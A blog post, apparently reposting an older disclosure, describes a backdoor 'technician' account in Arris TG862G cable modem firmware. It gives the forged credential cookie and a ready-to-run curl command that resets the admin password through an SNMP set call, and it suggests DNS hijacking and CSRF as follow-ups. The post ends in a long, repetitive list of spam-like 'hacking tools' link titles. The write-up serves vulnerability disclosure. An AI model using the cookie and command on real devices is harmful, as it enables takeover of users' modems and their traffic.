Thursday, January 18, 2024

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(




That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:


That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:


Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....



That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:


This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


More information

  1. Nsa Hack Tools
  2. Hacker Tools Software
  3. Pentest Recon Tools
  4. Hacking Tools For Kali Linux
  5. Android Hack Tools Github
  6. Pentest Recon Tools
  7. Hack Tools Mac
  8. Pentest Tools Alternative
  9. Pentest Tools Online
  10. Kik Hack Tools
  11. Pentest Recon Tools
  12. Tools For Hacker
  13. Hack Tools Mac
  14. Hack Tools
  15. Computer Hacker
  16. Best Hacking Tools 2019
  17. Hacker Tools 2020
  18. Free Pentest Tools For Windows
  19. Easy Hack Tools
  20. Hack Tools Online
  21. Hacking Tools Free Download
  22. Pentest Tools List
  23. Pentest Tools List
  24. Hacking Tools Hardware
  25. Hacking Tools For Mac
  26. Tools 4 Hack
  27. Hacker Tools Software
  28. Pentest Tools Find Subdomains
  29. Hack Tool Apk
  30. Pentest Tools Url Fuzzer
  31. Hacker Tools
  32. Pentest Tools Url Fuzzer
  33. Pentest Tools Github
  34. Hacker Tools Apk Download
  35. Hacking Tools Name
  36. Hacker Tools For Pc
  37. Hacker Tools 2019
  38. Hack Website Online Tool
  39. What Are Hacking Tools
  40. Computer Hacker
  41. Pentest Tools Github
  42. Hacking Tools Software
  43. Best Hacking Tools 2020
  44. Install Pentest Tools Ubuntu
  45. Best Hacking Tools 2019
  46. Hacker Tools 2020
  47. Hack Tool Apk
  48. Hacker
  49. Pentest Tools List
  50. Hacking Tools Github
  51. Hacker Tools Free
  52. Nsa Hacker Tools
  53. Best Hacking Tools 2019
  54. Hack And Tools
  55. Beginner Hacker Tools
  56. Hacking Tools Online
  57. Hacking Apps
  58. Hacking Tools
  59. Pentest Box Tools Download
  60. Hacking Tools For Beginners
  61. Hacking Tools For Pc
  62. Pentest Tools For Ubuntu
  63. Hack Tools For Ubuntu
  64. Pentest Tools Nmap
  65. Hacking Tools For Windows Free Download
  66. Hacker Tools For Windows
  67. Hack Tools Github
  68. Computer Hacker
  69. Hack Tools Download
  70. Hackers Toolbox
  71. Hacker Tools Windows
  72. Tools For Hacker
  73. Hack Tools For Ubuntu
  74. Pentest Tools Alternative
  75. Hacking Tools 2020
  76. Hacker Techniques Tools And Incident Handling
  77. Pentest Tools Url Fuzzer
  78. Hacker Tools Free
  79. Pentest Tools Find Subdomains
  80. Game Hacking
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)